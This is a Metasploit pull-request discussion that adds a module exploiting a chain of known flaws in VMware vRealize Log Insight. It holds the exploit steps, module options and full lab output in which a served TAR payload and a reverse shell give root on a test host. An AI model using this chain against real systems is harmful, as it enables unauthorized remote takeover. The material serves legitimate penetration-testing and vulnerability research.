Add VMware vRealize Log Insight unauthenticated RCE exploit

[EgeBalci]

Hello 👋

This module exploits multiple vulnerabilities for achieving unauthenticated remote code execution on the VMware vRealize Log Insight version v8.x. Module achieves code execution via triggering a RemotePakDownloadCommand command via the exposed thrift service after obtaining the node token by calling a GetConfigRequest thrift command. After the download, we trigger a PakUpgradeCommand for extracting the specially crafted TAR archive that we served, which then will place the JSP payload under a certain API endpoint (pre-authenticated) location for us to call.

I'm aware that the code looks ugly, but since this is an important target, I wanted to push it asap. I had to manually construct thrift packages because Rex::Proto::Thrift is very premature at the moment. Also, I couldn't find a better way to embed the file contents. (certs and checksums) Open to suggestions.

Testing Environment Setup

For installing the vulnerable version follow the steps below,

1. To obtain the vulnerable OVA image, first create a customer account at VMware (trial license is sufficient)
2. Navigate here and download Virtual Appliance
3. Import the OVA image into a virtualization software (VirtualBox is used for this case).
4. Start the VMware_vCenter_Log_Insight image and proceed with the initial installation steps through the web interface of the product.

After these steps, the web portal (port 80/443) and Apache thrift service (port 16520) should be accessible.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Do use exploit/linux/http/vmware_vrli_rce
• Do set RHOST [IP]
• Do check

[EgeBalci]

Any takers? :)

[adfoster-r7]

Sorry for the delay; the team's been pretty swamped with recent events, DefCon/etc

[jheysel-r7]

Thanks for another great module @EgeBalci. I was able to get a session running in the context of the root user after applying a couple of the suggestion I've mentioned here.

[EgeBalci]

Hi folks, I have made lots of changes, here is a small summary.

• Decodedmf_file.
• Added extra sleep duration (WaitForUpgradeDuration) after issuing a PakUpgrade command. This is necessary because sometimes PakUpgrade is stalling and we send the doc request too early.
• Refactored thrift code and added header for getConfig request as suggested.
• Removed getNodeType thrift call. After a little analysis I discovered we don't actually need it.
• Added a extra check for SRVHOST because it shouldn't be pointing to localhost.

[EgeBalci]

Open to suggestions for this one.

[smcintyre-r7]

I gave this a shot on a v8.10 target and it is working well. I saw in the module description that you had tested it on 8.0.2 so now we have greater coverage.

There were some issues at first with shell payloads until I set PrependFork to true, so you'll see that along with a few other changes I made in 21dde19. With that change in place, staged and unstage, meterpreter and shell payloads all worked.

Testing Output

Module options (exploit/linux/http/vmware_vrli_rce):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                  192.168.159.28   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                   443              yes       The target port (TCP)
   SSL                     true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI               /                yes       The URI of the VRLI web service
   THRIFT_PORT             16520            yes       Thrift service port
   THRIFT_TIMEOUT          10               yes       Timeout duration for thrift service
   URIPATH                                  no        The URI to use for this exploit (default is random)
   VHOST                                    no        HTTP server virtual host
   WaitForResponseTimeout  10               yes       The timeout in seconds for RemotePakDownload response
   WaitForUpgradeDuration  2                yes       The sleep duration in seconds for PakUpgrade process


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   VMware vRealize Log Insight < v8.10.2



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/vmware_vrli_rce) > check

[*] 192.168.159.28:443 - Checking if 192.168.159.28:443 can be exploited.
[*] 192.168.159.28:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
msf6 exploit(linux/http/vmware_vrli_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.28:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.159.28:443 - Checking if 192.168.159.28:443 can be exploited.
[+] 192.168.159.28:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
[*] 192.168.159.28:443 - Starting Payload Server
[*] 192.168.159.28:443 - Using URL: http://192.168.159.128:8080/vWLEYHv.tar
[*] 192.168.159.28:443 - Fetching thrift config...
[+] 192.168.159.28:443 - Obtained node token: 596f1d93-b227-4550-8cfa-3c511f9c19fe
[*] 192.168.159.28:443 - Sending getNodeType...
[*] 192.168.159.28:443 - Sending RemotePakDownloadCommand...
[*] 192.168.159.28:443 - Sending PakUpgradeCommand...
[*] 192.168.159.28:443 - Encoding the payload as JSP
[*] 192.168.159.28:443 - Malicious TAR payload created (117760 bytes)
[+] 192.168.159.28:443 - Payload requested by 192.168.159.28:443, sending...
[+] 192.168.159.28:443 - PakUpgrade request is successful
[*] 192.168.159.28:443 - Waiting 2 second for PakUpgrade...
[*] 192.168.159.28:443 - 192.168.159.28:443 - Triggering JSP payload...
[*] Sending stage (38 bytes) to 192.168.159.28
[+] 192.168.159.28:443 - Deleted /tmp/vWLEYHv.pak
[+] 192.168.159.28:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp
[*] Command shell session 2 opened (192.168.159.128:4444 -> 192.168.159.28:45258) at 2023-09-08 16:50:38 -0400
[*] 192.168.159.28:443 - Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/lib/loginsight

Thanks a lot for submitting this module to us! Once the tests pass on the commit I added, I'll get this landed.

[smcintyre-r7]

Release Notes

This adds an exploit for VMware vRealize Log Insight versions prior to 8.10.2. It chains multiple vulnerabilities (CVE-2022-31706, CVE-2022-31704, CVE-2022-31711) together to achieve unauthenticated RCE.